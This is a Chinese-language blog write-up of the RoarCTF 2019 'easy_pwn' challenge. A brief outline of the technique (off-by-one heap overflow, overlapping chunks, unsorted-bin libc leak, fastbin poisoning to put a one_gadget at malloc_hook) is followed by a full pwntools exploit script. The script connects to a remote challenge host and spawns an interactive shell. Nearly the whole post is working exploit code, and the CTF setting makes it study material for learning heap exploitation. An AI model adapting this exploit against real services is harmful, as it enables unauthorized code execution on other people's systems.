RoarCTF-2019
RoarCTF 2019
easy_pwn
思路:
write note
存在 off-by-one
漏洞。填充 chunk A
溢出改写下一个chunk B
的size
来扩大溢出范围,再分配chunk B
来溢出改写free
掉的chunk C's fd
到small chunk D
,free
掉small chunk D
,show note
泄漏 unsorted_bin
得到libc_base
。
再通过溢出改写 fast_bin chunk fd
,分配到malloc_hook
附近写 one_gadget
。触发 malloc_printerr
来getshell
#!/usr/bin/env python
#coding=utf8
from pwn import *
p=process('./easy_pwn')
p=remote('39.97.182.233',40205)
ctx = context
ctx.terminal=['tmux','splitw','-h']
#----- debug info -----#
# ctx.log_level = 'debug'
#----- debug info -----#
#----- quick script -----#
sd =lambda c:p.send(c)
sdl =lambda c:p.sendline(c)
sda = lambda a,c: p.sendafter(a,c)
sdla = lambda a,c: p.sendlineafter(a,c)
rl =lambda :p.recvline()
ru =lambda c:p.recvuntil(c,True)
rle =lambda c:p.recvline_endswith(c,keepends=False)
rls =lambda c:p.recvline_startswith(c,False)
rn = lambda c:p.recvn(c)
uu64 = lambda c: u64(c.ljust(8,chr(0)))
itr =lambda :p.interactive()
#----- quick script -----#
#----- global variables -----#
#----- global variables -----#
def cmd(c):
sdla('choice: ',str(c))
def add(sz):
cmd(1)
sdla('size: ',str(sz))
def edit(idx,sz,c):
cmd(2)
sdla('index: ',str(idx))
sdla('size: ',str(sz))
sda('content: ',c)
def edit_over10(idx,sz,c):
cmd(2)
sdla('index: ',str(idx))
sdla('size: ',str(sz+10))
sda('content: ',c)
def free(idx):
cmd(3)
sdla('index: ',str(idx))
def show(idx):
cmd(4)
sdla('index: ',str(idx))
def attack():
# show 0x01122
add(0x18) #0
add(0x18) #1
add(0x18) #2
add(0x18) #3
add(0x18) #4
add(0x18) #5
add(0x80) #6 0xc0
add(0x18) #7
add(0x28) #8
add(0x28) #9
add(0x60) #10
add(0x60) #11
add(0x28) #12
add(0x28) #13
add(0x28) #14
edit_over10(0,0x18,'a'*0x18+'\x41') #prepare overflow
free(1)
add(0x38) #1
edit(1,0x20,'\x00'*0x18+p64(0x21)) #recover size;
edit_over10(4,0x18,'a'*0x18+'\xb1')
free(5)
add(0xa1) #5
edit(5,0x20,'\x00'*0x18+p64(0x21))
free(3)
free(2)
edit(1,0x21,'a'*0x18+p64(0x21)+'\xc0')
add(0x18) #2
add(0x18) #3
edit(5,0x20,'\x00'*0x18+p64(0x91))
free(6)
show(3)
unsorted_bin=uu64(rn(6+9)[9:])
print(hex(unsorted_bin))
base=unsorted_bin-0x3c4b78
print(hex(base))
fake_chunk=base+3951365-0x10-0x8
one=base+0xf02a4
print(hex(one))
add(0x80)
edit_over10(8,0x28,'a'*0x28+'\xa1')
free(9)
add(0x98) #9
edit(9,0x30,'\x00'*0x28+p64(0x71))
free(11)
free(10)
edit(9,0x38,'\x00'*0x28+p64(0x71)+p64(fake_chunk))
add(0x60) #10
add(0x60) #11
edit(11,0x13+8,0x13*'\x00'+p64(one))
show(0)
edit_over10(12,0x28,'a'*0x28+'\x88')
free(13)
#gdb.attach(p,'b *')
#free(6)
#add(0x20)
itr()
pass
if __name__=="__main__":
attack()
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。
文章标题:RoarCTF-2019
本文作者:枫云李
发布时间:2019-10-12, 00:00:00
最后更新:2020-04-11, 01:25:10
原始链接:https://primelyw.github.io/2019/10/12/RoarCTF-2019/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。